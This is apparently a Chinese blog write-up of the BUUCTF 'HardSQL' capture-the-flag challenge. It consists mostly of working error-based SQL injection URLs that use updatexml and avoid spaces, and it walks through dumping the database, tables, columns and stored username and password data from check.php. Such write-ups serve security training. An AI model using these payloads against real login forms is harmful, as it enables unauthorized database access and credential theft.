BUUCTF [极客大挑战 2019]HardSQL 1

BUUCTF [极客大挑战 2019]HardSQL 1

  • 基于updatexml报错注入

  • 查询数据库:check.php?username=admin’or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=21
    BUUCTF [极客大挑战 2019]HardSQL 1_第1张图片

  • 查询数据表:check.php?username=admin’or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=21
    BUUCTF [极客大挑战 2019]HardSQL 1_第2张图片

  • 查询数据表列:check.php?username=admin’or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘H4rDsq1’)),0x7e),1))%23&password=21
    BUUCTF [极客大挑战 2019]HardSQL 1_第3张图片

  • 查询数据:check.php?username=admin’or(updatexml(1,concat(0x7e,(select(group_concat(username,’~’,password))from(H4rDsq1)),0x7e),1))%23&password=21
    只查到一半
    BUUCTF [极客大挑战 2019]HardSQL 1_第4张图片

  • 只查到了一半再用left()right()语句查询拼接
    check.php?username=admin’or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=21
    BUUCTF [极客大挑战 2019]HardSQL 1_第5张图片

你可能感兴趣的:(CTF)